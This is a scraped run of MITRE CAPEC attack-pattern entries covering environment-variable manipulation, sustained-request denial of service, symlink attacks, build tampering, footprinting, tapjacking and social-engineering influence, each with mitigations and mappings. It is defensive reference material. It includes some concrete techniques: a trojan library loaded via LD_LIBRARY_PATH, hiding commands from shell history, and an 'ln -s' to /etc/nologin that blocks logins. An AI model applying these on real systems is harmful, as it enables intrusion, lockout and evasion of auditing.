CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	14	Client-side Injection-induced Buffer Overflow

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Probe target application: The adversary first probes the target application to determine important information about the target. This information could include types software used, software versions, what user input the application consumes, and so on. Most importantly, the adversary tries to determine what environment variables might be used by the underlying software, or even the application itself.

Experiment

Find user-controlled environment variables: Using the information found by probing the application, the adversary attempts to manipulate any user-controlled environment variables they have found are being used by the application, or suspect are being used by the application, and observe the effects of these changes. If the adversary notices any significant changes to the application, they will know that a certain environment variable is important to the application behavior and indicates a possible attack vector.
Techniques
Alter known environment variables such as "$PATH", "$HOSTNAME", or "LD_LIBRARY_PATH" and see if application behavior changes.

Exploit

Manipulate user-controlled environment variables: The adversary manipulates the found environment variable(s) to abuse the normal flow of processes or to gain access to privileged resources.

Prerequisites

An environment variable is accessible to the user.

An environment variable used by the application can be tainted with user supplied data.

Input data used in an environment variable is not validated properly.

The variables encapsulation is not done properly. For instance setting a variable as public in a class makes it visible and an adversary may attempt to manipulate that variable.

Skills Required

[Level: Low]

In a web based scenario, the client controls the data that it submitted to the server. So anybody can try to send malicious data and try to bypass the authentication mechanism.

[Level: High]

Some more advanced attacks may require knowledge about protocols and probing technique which help controlling a variable. The malicious user may try to understand the authentication mechanism in order to defeat it.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Bypass Protection Mechanism
Availability	Unreliable Execution
Confidentiality	Read Data
Accountability	Hide Activities

Mitigations

Protect environment variables against unauthorized read and write access.

Protect the configuration files which contain environment variables against illegitimate read and write access.

Apply the least privilege principles. If a process has no legitimate reason to read an environment variable do not give that privilege.

Example Instances

Changing the LD_LIBRARY_PATH environment variable in TELNET will cause TELNET to use an alternate (possibly Trojan) version of a function library. The Trojan library must be accessible using the target file system and should include Trojan code that will allow the user to log in with a bad password. This requires that the adversary upload the Trojan library to a specific location on the target. As an alternative to uploading a Trojan file, some file systems support file paths that include remote addresses, such as \\172.16.2.100\shared_files\trojan_dll.dll. See also: Path Manipulation (CVE-1999-0073)

The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that " ls" will not be saved, but "ls" would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.

Related Weaknesses

CWE-ID	Weakness Name
353	Missing Support for Integrity Check
285	Improper Authorization
302	Authentication Bypass by Assumed-Immutable Data
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
15	External Control of System or Configuration Setting
73	External Control of File Name or Path
20	Improper Input Validation
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1562.003	Impair Defenses:Impair Command History Logging
1574.006	Hijack Execution Flow:Dynamic Linker Hijacking
1574.007	Hijack Execution Flow:Path Interception by PATH Environment Variable

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required, Examples-Instances, References
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Example_Instances
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Consequences, Mitigations, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Execution_Flow, Prerequisites

CAPEC-227: Sustained Client Engagement

Attack Pattern ID: 227

Abstraction: Meta

View customized information:

Description

Extended Description

The degree to which the attack is successful depends upon the adversary's ability to sustain resource requests over time with a volume that exceeds the normal usage by legitimate users, as well as other mitigating circumstances such as the target's ability to shift load or acquire additional resources to deal with the depletion. This attack differs from a flooding attack as it is not entirely dependent upon large volumes of requests, and it differs from resource leak exposures which tend to exploit the surrounding environment needed for the resource to function. The key factor in a sustainment attack are the repeated requests that take longer to process than usual.

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	469	HTTP DoS

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

This pattern of attack requires a temporal aspect to the servicing of a given request. Success can be achieved if the adversary can make requests that collectively take more time to complete than legitimate user requests within the same time frame.

Resources Required

To successfully execute this pattern of attack, a script or program is often required that is capable of continually engaging the target and maintaining sustained usage of a specific resource. Depending on the configuration of the target, it may or may not be necessary to involve a network or cluster of objects all capable of making parallel requests.

Mitigations

Potential mitigations include requiring a unique login for each resource request, constraining local unprivileged access by disallowing simultaneous engagements of the resource, or limiting access to the resource to one access per IP address. In such scenarios, the adversary would have to increase engagements either by launching multiple sessions manually or programmatically to counter such defenses.

Related Weaknesses

CWE-ID	Weakness Name
400	Uncontrolled Resource Consumption

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1499	Endpoint Denial of Service

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
10	Denial of Service

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-132: Symlink Attack

Attack Pattern ID: 132

Abstraction: Detailed

View customized information:

Description

An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.

Extended Description

The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications.

In some variants of this attack the adversary may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the adversary may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the adversary to control the actions of the target or to cause the target to expose information to the adversary. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the adversary would normally have.

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	159	Redirect Access to Libraries

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Execution Flow

Explore

Identify Target: Adversary identifies the target application by determining whether there is sufficient check before writing data to a file and creating symlinks to files in different directories.

Techniques
The adversary writes to files in different directories to check whether the application has sufficient checking before file operations.
The adversary creates symlinks to files in different directories.

Experiment

Try to create symlinks to different files: The adversary then uses a variety of techniques, such as monitoring or guessing to create symlinks to the files accessed by the target application in the directories which are identified in the explore phase.

Techniques
The adversary monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the adversary can delay the operations by using "sleep(2)" and "usleep()" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application.
The adversary may need a little guesswork on the filenames on which the target application would operate.
The adversary tries to create symlinks to the various filenames.

Exploit

Target application operates on created symlinks to sensitive files: The adversary is able to create symlinks to sensitive files while the target application is operating on the file.
Techniques
Create the symlink to the sensitive file such as configuration files, etc.

Prerequisites

The targeted application must perform the desired activities on a file without checking whether the file is a symbolic link or not. The adversary must be able to predict the name of the file the target application is modifying and be able to create a new symbolic link where that file would appear.

Skills Required

[Level: Low]

To create symlinks

[Level: High]

To identify the files and create the symlinks during the file operation time window

Resources Required

None: No specialized resources are required to execute this type of attack. The only requirement is the ability to create the necessary symbolic link.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Integrity	Modify Data
Confidentiality	Read Data
Integrity	Modify Data
Authorization	Execute Unauthorized Commands
Accountability Authentication Authorization Non-Repudiation	Gain Privileges
Access Control Authorization	Bypass Protection Mechanism
Availability	Unreliable Execution

Mitigations

Design: Check for the existence of files to be created, if in existence verify they are neither symlinks nor hard links before opening them.

Implementation: Use randomly generated file names for temporary files. Give the files restrictive permissions.

Example Instances

The adversary creates a symlink with the "same" name as the file which the application is intending to write to. The application will write to the file- "causing the data to be written where the symlink is pointing". An attack like this can be demonstrated as follows:

root# vulprog myFile

{...program does some processing...]

adversary# ln –s /etc/nologin myFile

[...program writes to 'myFile', which points to /etc/nologin...]

In the above example, the root user ran a program with poorly written file handling routines, providing the filename "myFile" to vulnprog for the relevant data to be written to. However, the adversary happened to be looking over the shoulder of "root" at the time, and created a link from myFile to /etc/nologin. The attack would make no user be able to login.

Related Weaknesses

CWE-ID	Weakness Name
59	Improper Link Resolution Before File Access ('Link Following')

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1547.009	Boot or Logon Autostart Execution:Shortcut Modification

References

[REF-13] Shaun Colley. "Crafting Symlinks for Fun and Profit". <http://www.infosecwriters.com/texts.php?op=display&id=159>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated References
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Consequences
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Execution_Flow, Extended_Description, Prerequisites
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-678: System Build Data Maliciously Altered

Attack Pattern ID: 678

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production, Sustainment

Prerequisites

An adversary has access to the data files and processes used for executing system configuration and performing the build.

Consequences

Scope	Impact	Likelihood
Integrity	Execute Unauthorized Commands
Access Control	Gain Privileges
Confidentiality	Modify Data Read Data

Mitigations

Implement configuration management security practices that protect the integrity of software and associated data.

Monitor and control access to the configuration management system.

Harden centralized repositories against attack.

Establish acceptance criteria for configuration management check-in to assure integrity.

Plan for and audit the security of configuration management administration processes.

Maintain configuration control over operational systems.

Example Instances

‘Make’ is a program used for building executable programs and libraries from source code by executing commands and following rules in a ‘makefile’. It can create a malicious executable if commands or dependency paths in the makefile are maliciously altered to execute an unwanted command or reference as a dependency maliciously altered code.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.002	Supply Chain Compromise: Compromise Software Supply Chain

References

Content History

Submissions
Submission Date	Submitter	Organization
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)
Modifications
Modification Date	Modifier	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Description

CAPEC-580: System Footprinting

Attack Pattern ID: 580

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	169	Footprinting
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	85	AJAX Footprinting
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	581	Security Software Footprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary must have logical access to the target network and system.

Skills Required

[Level: Low]

The adversary needs to know basic linux commands.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

Keep patches up to date by installing weekly or daily if possible.

Identify programs that may be used to acquire peripheral information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist.

Related Weaknesses

CWE-ID	Weakness Name
204	Observable Response Discrepancy
205	Observable Behavioral Discrepancy
208	Observable Timing Discrepancy

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1082	System Information Discovery

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations, Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated @Name, Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses
Previous Entry Names
Change Date	Previous Entry Name
2020-12-17 (Version 3.4)	Application Footprinting

CAPEC-694: System Location Discovery

Attack Pattern ID: 694

Abstraction: Standard

View customized information:

Description

An adversary collects information about the target system in an attempt to identify the system's geographical location.

Information gathered could include keyboard layout, system language, and timezone. This information may benefit an adversary in confirming the desired target and/or tailoring further attacks.

Likelihood Of Attack

High

Typical Severity

Very Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	169	Footprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

System Locale Information Discovery: The adversary examines system information from various sources such as registry and native API functions and correlates the gathered information to infer the geographical location of the target system

Techniques
Registry Query: Query the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ContentIndex\Language\Language_Dialect on Windows to obtain system language, Computer\HKEY_CURRENT_USER\Keyboard Layout\Preload to obtain the hexadecimal language IDs of the current user's preloaded keyboard layouts, and Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation to obtain the system timezone configuration
Native API Requests: Parse the outputs of Windows API functions GetTimeZoneInformation, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID to obtain information about languages, keyboard layouts, and timezones installed on the system or on macOS or Linux systems, query locale to obtain the $LANG environment variable and view keyboard layout information or use timeanddatectl status to show the system clock settings.
Read Configuration Files: For macOS and Linux-based systems, view the /etc/vconsole.conf file to get information about the keyboard mapping and console font.

Prerequisites

The adversary must have some level of access to the system and have a basic understanding of the operating system in order to query the appropriate sources for relevant information.

Skills Required

[Level: Low]

The adversary must know how to query various system sources of information respective of the system's operating system to obtain the relevant information.

Resources Required

The adversary requires access to the target's operating system tools to query relevant system information. On windows, registry queries can be conducted with powershell, wmi, or regedit. On Linux or macOS, queries can be performed with through a shell.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Mitigations

To reduce the amount of information gathered, one could disable various geolocation features of the operating system not required for system operation.

Related Weaknesses

CWE-ID	Weakness Name
497	Exposure of Sensitive System Information to an Unauthorized Control Sphere

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1614	System Language Discovery

References

[REF-727] "Language-Specific Registry Entries". <https://learn.microsoft.com/en-us/previous-versions/windows/desktop/indexsrv/language-specific-registry-entries>. URL validated: 2018-05-31.

[REF-728] "winnls.h header". <https://learn.microsoft.com/en-us/windows/win32/api/winnls/>. URL validated: 2022-08-23.

[REF-729] "local (1p) - Linux Man Pages". <https://www.systutorials.com/docs/linux/man/1p-locale/>.

[REF-730] "vconsole.conf". <https://www.freedesktop.org/software/systemd/man/vconsole.conf.html>.

[REF-731] "timedatectl". <https://www.freedesktop.org/software/systemd/man/timedatectl.html>. URL validated: 2022-08-12.

Content History

Submissions
Submission Date	Submitter	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)

CAPEC-506: Tapjacking

Attack Pattern ID: 506

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	173	Action Spoofing

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

This pattern of attack requires the ability to execute a malicious application on the user's device. This malicious application is used to present the interface to the user and make the attack possible.

Related Weaknesses

CWE-ID	Weakness Name
1021	Improper Restriction of Rendered UI Layers or Frames

References

[REF-436] Marcus Niemietz and Jorg Schwenk. "UI Redressing Attacks on Android Devices". 4. New Browserless Attacks. Horst Gortz Institute for IT-Security. 2012. <https://media.blackhat.com/ad-12/Niemietz/bh-ad-12-androidmarcus_niemietz-WP.pdf>.

[REF-437] David Richardson. "Look-10-007 - Tapjacking". Lookout Mobile Security. 2010. <https://blog.lookout.com/look-10-007-tapjacking/>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Description Summary
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Related_Weaknesses
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Description Summary
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description

CAPEC-429: Target Influence via Eye Cues

Attack Pattern ID: 429

Abstraction: Detailed

View customized information:

Description

The adversary gains information via non-verbal means from the target through eye movements.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	427	Influence via Psychological Principles

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Description Summary

CAPEC-425: Target Influence via Framing

Attack Pattern ID: 425

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	416	Manipulate Human Behavior

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

The adversary must have the means and knowledge of how to communicate with the target in some manner.

Skills Required

[Level: Low]

The adversary requires strong inter-personal and communication skills.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other

Mitigations

An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.

Avoid sharing unnecessary information during interactions beyond what is absolutely required for effective communication.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Mitigations

CAPEC-435: Target Influence via Instant Rapport

Attack Pattern ID: 435

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	427	Influence via Psychological Principles

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)

CAPEC-434: Target Influence via Interview and Interrogation

Attack Pattern ID: 434

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	427	Influence via Psychological Principles

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)

CAPEC-433: Target Influence via The Human Buffer Overflow

Attack Pattern ID: 433

Abstraction: Detailed

View customized information:

Description

Extended Description

The fundamental difference is that embedded messages have a complete semantic quality, rather than mere imagery, and the mind of the target tends to key off of particular dominant patterns. The remaining information, carefully structured, speaks directly to the subconscious with a subtle, indirect, command. The effect is to produce a pattern of thinking that the attacker has predetermined but is buried within the message and not overtly stated. Structuring a human "buffer overflow" requires precise attention to detail and the use of information in a manner that distracts the conscious mind from the message the subconscious is receiving.

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	427	Influence via Psychological Principles

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-348] "The Official Social Engineering Portal". Social-Engineer.org. Tick Tock Computers, LLC. <http://www.social-engineer.org>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
